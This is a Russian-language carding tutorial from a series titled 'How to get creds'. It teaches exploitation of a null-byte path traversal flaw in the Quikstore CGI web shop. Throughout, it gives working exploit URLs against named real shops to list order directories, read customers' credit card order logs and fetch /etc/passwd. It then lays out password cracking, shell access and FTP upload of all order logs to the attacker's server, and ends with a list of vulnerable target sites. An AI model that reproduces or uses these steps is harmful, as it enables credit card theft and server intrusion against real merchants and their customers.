Привет, господа хакеры, вот вам
продолжение серии моих статей "Как
поиметь кред", и, если все будет оки, то
буду писать стати на тему имения кред раз в
неделю. Ладно, не буду вас парить
такими темами, приступим сразу к делу.
Итак, что вам понадобится для взлома
веб шопа?
1 - компьютер и доступ в интернет
2 - чутка ума
3 - умение пользоваться поисковой
системой
4 - прочитать эту статью
Сегодня я буду вам рассказывать про
тактику взлома quikstore.cgi. Quikstore это
буржуйский веб шоп очень хорошего качества,
его долго делали и много народа старалось
над его разработкой, как обычно,
перестарались, допустив в нем очень
полезную для хакеров ошибку. Сколько не
говорили про ошибку в нулевом символе,
многие до сих пор ее не поняли. Итак, вот вам
пример уязвимости:
http://www.lockpickers.com/cgi-bin/ quikstore.cgi?page=../%00html&cart_id=
Набрав у себя в браузере этот адрес, вы
увидите, что-то типа
½Y. .8. ..ˆK.html½À©Y.
access.logÀ.Y.check_setup.cgi.
Y.email_addresses.log°Y. language.cfg.þÚ¾Y.
quikstore.cfg.Â.Y. quikstore.cgiþÚ.öG
Конечно, мусора много, но разобраться в
названиях можно. Посмотрев на всякие
названия, мы видим каталог orders, пора нам
в него зайти
http://www.lockpickers.com/cgi-bin/ quikstore.cgi?page=../orders/%00html&cart_id=
Ага, и мы видим:
.H ..Y. ..(.H 599201.logА,.H
154519.logА-.H
985367.logА..H 865125.logА/.H 315856.logА0.H
937483.logА1.H 378887.logА2.H 169435.logА3.H
479192.logА4.H 257362.logА5.H 115183.logА6.H
11395.logА7.H 167788.logА8.H 559841.logА9.H
917539.logА:.H 354163.logА;.H 299892.logА<.H
280139.logА=.H5817.log.А>.H 350266.logА?.H
26773.logА@.H 360859.logАA.H 199829.logАB.H
832283.logАC.H 412408.logАD.H 508280.logАE.H
456098.logАF.H 126968.logАG.H 183660.logАH.H
569004.logАI.H 772139.logАJ.H 103115.logАK.H
654675.logАL.H 884681.logАM.H 638658.logАO.H
188875.logАP.H 225653.logАN.H 753313.logАQ.H
898714.logАR.H 188818.logАS.H 439711.logАT.H
927352.logАU.H 431996.logА..H 672967.logА..H
159103.logА..H 830744.logА).H 566537.logА*.H
253144.logА+.H 5138.log.А..H 663457.logА..H
586008.logА..H 997506.logА..H 856583.logА..H
693685.logА..H 655797.logА..H 814237.logА..H
882103.logА..H 443014.logА..H 380792.logА..H
368613.logА..H 914079.logА..H 773799.logА..H
267996.logА..H 57162.logА..H 882551.logА..H
259987.logА..H 312268.logА..H 994056.logА..H
281473.logА..H 726034.logА..H 566936.logА..H
558117.logА..H 317098.logА .H 238429.logА╝.H
63477.logА╬.H 802520.logА..H 938229.logА÷.H
351224.logА╫.H 390858.logА..H 735378.logА..H
221629.logАЁ.H 15072.logА©.H 90119.logА╢.H
823612.logА².H 347629.logА..H 891608.logА..H
514696.logА
Ага, много файлов с расширением .log, это и
есть на самом деле вожделенные сс!! Теперь
просто вводим имя файла в наш урл и видим
всю инфу о сс. Вот смотрите:
http://www.lockpickers.com/cgi-bin/ quikstore.cgi?page=../orders/898714.log%
00html&cart_id=
Но в формате, в котором все это выдается,
смотреть неудобно, поэтому мы
просматриваем исходники html странички и
видим все рассортированное в удобном
формате! Часто бывает такая фича, что нельзя
просматривать каталоги, а значит нельзя
увидеть номера файлов с кредами, чтобы их
просмотреть нужно попробовать сделать вот
как:
http://www.lockpickers.com/cgi-bin/
quikstore.cgi?page=../../../../../../../../ etc/passwd%00html&cart_id=
Ага что мы поимели?? А угадайте с 3-ех раз
:). Лана, для тех кто в бронетанке скажу,
что мы поимели пассы этого сервака. Теперь
просто кормим их john the ripper и ломимся через
шелл. Но сначала подбираем пасс от юзера,
которому разрешен шелл! А далее, найдя wwwroot и
зайдя там в каталог orders, мы командируем
ftp
потом пишем open www.may-ftp-server.com
user *****
pas *****
put *.log
Ага, порядок. Мы закачали все файлы с
расширением log к себе на фтп. Ессно с фтп мы
можем слить все, что угодно, к примеру,
какой-нибудь скрипт... Да, кстати, если вы
подберете пасс от рута, то вы можете рулить
серваком, как захотите (это для самых умных
сказано)!!!
Ну и напоследок пару ссылочек с дырами:
http://www.lockpickers.com/cgi-bin/quikstore.cgi?
page=../orders/898714.log%00html&cart_id=
http://www.sterlingjudaica.com/cgi-bin/quikstore.cgi?
page=../orders/%00html&cart_id=
http://www.doityourselfpestctrl.com/cgi-
bin/quikstore.cgi?page=../orders/%00html&cart_id=
http://www.wellmanandwelsch.com/cgibin/quikstore.cgi?
page=../orders%00html&cart_id=